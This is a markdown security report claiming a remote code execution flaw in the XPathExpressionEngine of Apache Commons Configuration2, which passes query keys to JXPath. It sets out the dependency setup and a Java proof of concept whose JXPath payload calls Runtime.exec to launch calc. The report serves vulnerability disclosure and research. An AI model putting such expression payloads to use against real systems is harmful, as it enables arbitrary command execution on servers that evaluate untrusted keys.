RCE_report.md

Apache Commons Configuration2 Remote Code Execution Vulnerability Analysis

Vulnerability Overview

A remote code execution vulnerability has been discovered in the Apache Commons Configuration2 component. This vulnerability stems from the same underlying architectural design flaw as CVE-2022-41852—unsafe expression evaluation and dynamic code execution paths. Although CVE-2022-41852 was rejected due to controversy, the core security flaw persists in Commons Configuration2 with broader impact. As a core configuration management component for enterprise applications, Commons Configuration typically operates in higher-privileged contexts with a much larger attack surface. This vulnerability allows attackers to achieve arbitrary code execution through carefully crafted configuration input. The danger of this attack vector lies in exploiting the fundamental assumption that configuration data is "trusted" by applications, potentially rendering traditional input filtering and sandboxing mechanisms ineffective.

Affected Versions

• Component Name: Apache Commons Configuration2
• Affected Versions: All versions
• Maven Repository: https://mvnrepository.com/artifact/org.apache.commons/commons-configuration2

Vulnerable Code

/**
 * {@inheritDoc} This implementation interprets the passed in key as an XPATH expression.
 */
@Override
public <T> List<QueryResult<T>> query(final T root, final String key, final NodeHandler<T> handler) {
    if (StringUtils.isEmpty(key)) {
        final QueryResult<T> result = createResult(root);
        return Collections.singletonList(result);
    }
    final JXPathContext context = createContext(root, handler);
    List<?> results = context.selectNodes(key);
    if (results == null) {
        results = Collections.emptyList();
    }
    return convertResults(results);
}

Vulnerability Cause

1. Functionality Description:

   • The XPathExpressionEngine class in the Apache Commons Configuration2 component implements parsing functionality for XPath expressions
   • According to code comments, this implementation interprets the incoming key parameter as an XPath expression
   • This is the core functionality in Apache Commons Configuration2 for handling XPath queries

2. Vulnerability Root Cause:

   • This functionality uses the third-party component Apache Commons JXPath to process XPath expressions
   • In the query method, user input keys are directly passed to the JXPathContext.selectNodes() method for processing
   • Due to security flaws in Apache Commons JXPath, attackers can achieve remote code execution by crafting malicious XPath expressions

Proof Of Concept

1. Dependency Environment：
   • Since Apache Commons Configuration2 sets commons-jxpath as an optional dependency (optional=true), the following dependency needs to be added manually:：

   <dependency>
      <groupId>commons-jxpath</groupId>
      <artifactId>commons-jxpath</artifactId>
      <version>1.4.0</version>
   </dependency>
   <dependency>
        <groupId>org.apache.commons</groupId>
        <artifactId>commons-configuration2</artifactId>
        <version>2.12.0</version>
    </dependency>

• Commons Configuration2 marks commons-jxpath as an optional dependency in pom.xml:

  • This means that when using Commons Configuration2, if XPath-related functionality is needed, the commons-jxpath dependency must be added manually
  • The vulnerability trigger depends on the presence of the commons-jxpath component

  <dependency>
     <groupId>commons-jxpath</groupId>
     <artifactId>commons-jxpath</artifactId>
     <version>1.4.0</version>
     <optional>true</optional>
     <exclusions>
       <exclusion>
         <groupId>xerces</groupId>
         <artifactId>xerces</artifactId>
       </exclusion>
       <exclusion>
         <groupId>ant</groupId>
         <artifactId>ant-optional</artifactId>
       </exclusion>
     </exclusions>
   </dependency>

2. POC code：

   package com.example;
   
   import org.apache.commons.configuration2.tree.xpath.XPathExpressionEngine;
   import org.apache.commons.configuration2.tree.ImmutableNode;
   import org.apache.commons.configuration2.tree.InMemoryNodeModel;
   
   public class configuration2jexlXPathExpressionEngine {
   
       public static void main(String[] args) {
           try {
               XPathExpressionEngine xPathExpressionEngine = new XPathExpressionEngine();
               
               // create a ROOT node
               ImmutableNode root = new ImmutableNode.Builder().name("root").create();
               InMemoryNodeModel model = new InMemoryNodeModel(root);
               
               //  execute Java code via JXPath expression
               String payload = "exec(java.lang.Runtime.getRuntime(), 'calc')";
               try {
                   xPathExpressionEngine.query(model, payload, null);
               } catch (Exception e) {
                   e.printStackTrace();
               }
           } catch (Exception e) {
               e.printStackTrace();
           }
       }
   }

Reference

• CVE-2022-41852 Analysis

• CVE-2022-41852